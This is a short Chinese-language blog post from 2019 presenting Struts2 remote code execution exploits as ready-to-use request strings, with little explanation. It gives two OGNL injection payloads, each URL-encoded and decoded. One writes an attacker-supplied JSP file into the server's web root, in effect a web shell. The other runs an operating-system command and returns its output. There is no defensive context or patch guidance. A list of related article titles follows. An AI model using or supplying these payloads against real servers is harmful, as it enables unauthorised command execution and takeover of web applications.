Struts2遠程執行漏洞

原創 abao0918 2019-02-22 19:58

Struts2遠程執行漏洞

第一種***方式:新建一個文件,在文件中寫入一下自己的東西加上&data=要寫入文件he1p.jsp文件中的內容
***地址?class.classLoader.jarPath=(
 %23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean(false)%2C+
 %23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C+
 %23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C+
 %23sb%3Dnew+java.lang.StringBuffer()%2C+%23sb.append(%23req.getRealPath("/"))%2C+
 %23sb.append("he1p.jsp")%2C+%23fos%3Dnew+java.io.FileOutputStream(%23sb.toString())%2C+
 %23fos.write(%23req.getParameter('data').getBytes())%2C+
 %23darky%3D%40org.apache.struts2.ServletActionContext@getResponse().getWriter()%2C+
 %23darky.println("suceessful")%2C+
 %23darky.close()%2C+
 %23fos.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
轉義後的源碼:
***地址?class.classLoader.jarPath=(
 #context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
 #_memberAccess["allowStaticMethodAccess"]=true,+
 #[email protected]@getRequest(),+
 #sb=new+java.lang.StringBuffer(),+
 #sb.append(#req.getRealPath("/")),+
 #sb.append("he1p.jsp"),+
 #fos=new+java.io.FileOutputStream(#sb.toString()),+
 #fos.write(#req.getParameter('data').getBytes()),+
 #[email protected]@getResponse().getWriter(),+
 #darky.println("suceessful"),+
 #darky.close(),+
 #fos.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
第二種***方式,執行CMD命令
***地址?class.classLoader.jarPath=(
 %23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean(false)%2C+
 %23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C+
 %23darky%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C+
 %23myret%3D%40java.lang.Runtime%40getRuntime().exec("ls -la")%2C+
 %23is%3D%23myret.getInputStream()%2C+
 %23s%3D+new+java.util.Scanner(%23is).useDelimiter("\\A")%2C+
 %23darky.println(%23s.next())%2C+
 %23darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
轉義後的地址
***地址?class.classLoader.jarPath=(
 #context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
 #_memberAccess["allowStaticMethodAccess"]=true,+
 #[email protected]@getResponse().getWriter(),+
 #[email protected]@getRuntime().exec("ls -la"),+
 #is=#myret.getInputStream(),+
 #s=+new+java.util.Scanner(#is).useDelimiter("\\A"),+
 #darky.println(#s.next()),+
 #darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
***地址?class.classLoader.jarPath=(
 #context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
 #_memberAccess["allowStaticMethodAccess"]=true,+
 #[email protected]@getResponse().getWriter(),+
 #[email protected]@getRuntime().exec("ls -la"),+
 #is=#myret.getInputStream(),+
 #s=+new+java.util.Scanner(#is).useDelimiter("\\A"),+
 #darky.println(#s.next()),+
 #darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

類型混淆漏洞實例淺析

4DOGS 2019-02-23 00:37:58

又一次redis被刪庫跑路,索要0.6比特幣

冷暖己知 2019-02-23 00:29:40

sturts漏洞

vivisrf 2019-02-23 00:23:05

Redis 未授權訪問漏洞

wx5aab467ca1d27 2019-02-23 00:12:27

E-learning的現狀與未來

白璐 2019-02-23 14:05:08

java遠程文件下載,支持文件斷點續傳

ketqi 2019-02-23 13:23:52

windows 2008 R2遠程桌面無法本地複製文件到遠程解決

rm_rf_db 2019-02-23 00:36:19

PLC實現遠程通信的設置

傲慢偏見 2019-02-23 00:30:05

由於沒有遠程桌面授權服務器可以提供許可證

zwq5337 2019-02-23 00:04:44

高中新課程各學科遠程研修專題研討會

bobo1848 2019-02-23 00:01:44

struts2的迭代

藍色毒箭蛙 2019-02-23 13:46:03

Struts2輸入校驗總結

5fresh 2019-02-23 00:41:21

struts2日期類型轉換

chausa 2019-02-23 00:16:04

第一個Struts2例子

夜貓子java 2019-02-23 00:07:32

struts2註解

小浩51 2019-02-23 00:02:03